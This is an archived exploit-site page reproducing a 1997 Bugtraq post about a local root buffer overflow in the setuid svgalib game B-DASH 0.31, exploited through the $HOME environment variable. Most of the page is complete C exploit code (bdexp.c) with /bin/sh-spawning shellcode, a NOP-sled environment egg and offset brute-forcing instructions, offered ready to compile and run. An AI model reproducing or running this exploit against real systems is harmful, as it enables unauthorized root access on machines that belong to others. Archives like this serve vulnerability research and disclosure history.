B-DASH 0.31 $HOME overflow

Summary
Description:Standard pathetic suid-for-svgalab-totally-insecure application overflow.
Author:Nicolas Dubee <dube0866@EUROBRETAGNE.FR>
Compromise: root (local)
Vulnerable Systems:Mostly old versions of Linux. Possibly current Slackware. Anything with B-DASH v0.31
Date:21 June 1997 was when he posted his OLD exploit, ignore the date in the header, it is bogus.
Details


Date: Sat, 1 Jan 1994 03:00:59 +0100
From: Nicolas Dubee <dube0866@EUROBRETAGNE.FR>
To: BUGTRAQ@NETSPACE.ORG

hello all,

I've decided to spread my old exploits, so for a beginning
here is a really old one (sorry if it's known stuff): you have
guessed, this is a buffer overflow, this time it's with
an old svgalib (-> suid root) game: B-DASH 0.31.
It can still be found on some distributions of Linux
(Slackware ?, not Redhat).
The overflow comes with the $HOME environment variable, in
the vconfig() function (vconfig.c).

I included the exploit code below, it should be harmless since
b-dash is quite old.

laterz,

plaguez


------------------------
   plaguez / libpcap
dube0866@eurobretagne.fr
  http://www.innu.org
------------------------


// bdexp.c

/*
 *
 *   B-DASH 0.31 buffer overflow
 *
 *    by   plaguez
 *         dube0866@eurobretagne.fr
 *         http://www.innu.org
 *
 *
 *  compile:   cc bdexp.c -o bdexp
 *  exec:      ./bdexp 8
 *         or  ./bdexp 4
 *         or  ./bdexp 24 ...
 *  you may want to brute-force the offset (argv[1])
 */



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


#define EGGSIZE 2048

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

unsigned long get_sp() {
   asm("movl %esp,%eax");
}

char *buffer;
char *egg;

main(int argc,char **argv) {
   int i;
   int bsize=1124,offset;
   long *adpt;
   char *pt;

   if(argc!=2)
     {
        printf("\nusage  %s <offset>",argv[0]);
        exit(1);
     }
   offset=atoi(argv[1]);
   egg=(char *)malloc(EGGSIZE);
   buffer=(char *)malloc(bsize);

   pt=buffer;
   adpt=(long *) pt;
   for (i = 0; i <= bsize-4; i += 4)
    *(adpt++) = get_sp() - offset;

   memset(egg, 0x90,EGGSIZE);
   memcpy(&egg[EGGSIZE-strlen(shellcode)-2], shellcode, strlen(shellcode));

   egg[EGGSIZE-1] = 0;

   setenv("BUFF",egg,1);
   setenv("HOME", buffer, 1);

   printf("\nb-dashing ...\n");
   execl("/usr/games/bdash", "/usr/games/bdash", NULL);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault